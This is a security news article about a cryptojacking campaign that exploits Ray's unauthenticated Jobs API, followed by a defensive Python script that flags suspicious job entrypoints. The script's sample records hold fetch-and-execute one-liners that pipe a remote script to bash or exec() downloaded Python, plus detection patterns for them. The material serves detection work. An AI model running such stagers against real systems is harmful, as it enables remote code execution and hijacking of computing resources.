- Ray clusters remain vulnerable to remote code execution via unauthenticated Jobs API
- “IronErn440” threat group exploits flaw with AI-generated payloads and deploys XMRig cryptojacker
- More than 230,000 Ray servers exposed online, up from just a few thousand in 2023
Experts have warned that Ray clusters, still vulnerable to a critical severity flaw discovered years ago, are being used for cryptocurrency mining, data exfiltration and even distributed denial of service (DDoS) attacks.
Cybersecurity researchers at Oligo say this is the second major campaign to exploit the same flaw.
Ray is an open source framework that helps run Python programs faster by distributing work across multiple machines. Its clusters are groups of computers (one master node and multiple worker nodes) that work together to execute Ray tasks and workloads in a distributed and coordinated manner.
Deploy and hide XMRig
In 2023, Ray 2.6.3 and 2.8.0 were found to have a vulnerability that allows a remote attacker to execute arbitrary code via the Job Submission API. However, Anyscale, the company behind the product, did not fix it, on the grounds that Ray is designed to run in a “strictly controlled network environment.”
In other words, it is up to users to protect their infrastructure and ensure that the flaw is not abused.
But it was abused: first between September 2023 and March 2024, and again now. Oligo says threat actors tracked as “IronErn440” are now using AI-generated payloads to infiltrate vulnerable clusters. By exploiting the bug, attackers submit jobs to the unauthenticated Jobs API, executing multi-stage Bash and Python payloads hosted on GitHub and GitLab.
These payloads deploy malware to devices, typically the infamous XMRig cryptojacker. While this cryptojacker is usually easily detected (since it consumes 100% of the device’s processing power and renders it useless for almost anything else), the attackers attempted to work around this by capping it at 60% of the processing power.
Today, there are more than 230,000 Ray servers exposed to the Internet, the researchers warned, saying their number has grown significantly compared to only “a few thousand” that were available when the vulnerability was first discovered.
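As an added illustration (not code from Oligo, Anyscale or the original article), a defender can triage the job records listed by a cluster's Jobs API for entrypoints that download and execute code hosted on GitHub or GitLab, the pattern described above. The records are constructed samples, and the field names `submission_id` and `entrypoint` are assumed to match the cluster's job listing output.

```python
import re

# Code-hosting sites the article names as payload staging locations (incl. raw-content hosts).
CODE_HOSTS = re.compile(
    r"https?://(?:[\w.-]+\.)?(?:github\.com|githubusercontent\.com|gitlab\.com)/\S+", re.I)
# A downloader invoked from the job entrypoint.
FETCH = re.compile(r"\b(?:curl|wget)\b|urllib\.request|requests\.get", re.I)
# Downloaded content piped to an interpreter or executed in-process.
EXEC = re.compile(
    r"\|\s*(?:ba|z|da)?sh\b|\|\s*python[\d.]*\b|\bbash\s+-c\b|\bexec\(|\bchmod\s+\+x\b", re.I)

def score_entrypoint(entrypoint):
    """Return the reasons an entrypoint looks like a remote fetch-and-execute stager."""
    reasons = []
    if CODE_HOSTS.search(entrypoint):
        reasons.append("code-host-url")
    if FETCH.search(entrypoint):
        reasons.append("downloader")
    if EXEC.search(entrypoint):
        reasons.append("exec-of-download")
    return reasons

def triage(jobs, min_reasons=2):
    """Return (submission_id, reasons) for jobs with at least min_reasons indicators.

    Requiring two indicators keeps ordinary dependency installs from a code host quiet.
    """
    findings = []
    for job in jobs:
        reasons = score_entrypoint(job.get("entrypoint") or "")
        if len(reasons) >= min_reasons:
            findings.append((job.get("submission_id"), reasons))
    return findings

# Constructed sample records (hypothetical IDs, users and repositories).
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_constructed01", "entrypoint": "python train.py --epochs 10"},
    {"submission_id": "raysubmit_constructed02",
     "entrypoint": "curl -fsSL https://gitlab.com/example-user/example-repo/-/raw/main/stage1.sh | bash"},
    {"submission_id": "raysubmit_constructed03",
     "entrypoint": "pip install git+https://github.com/example-org/example-lib.git && python eval.py"},
    {"submission_id": "raysubmit_constructed04",
     "entrypoint": "python -c \"import urllib.request as u; exec(u.urlopen('https://raw.githubusercontent.com/example-user/example-repo/main/s.py').read())\""},
]

if __name__ == "__main__":
    for sid, reasons in triage(SAMPLE_JOBS):
        print(sid, ",".join(reasons))
```

A hit is a lead for review, not a verdict: any job that the cluster's own users did not submit is worth investigating regardless of what its entrypoint looks like.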
Via BleepingComputer




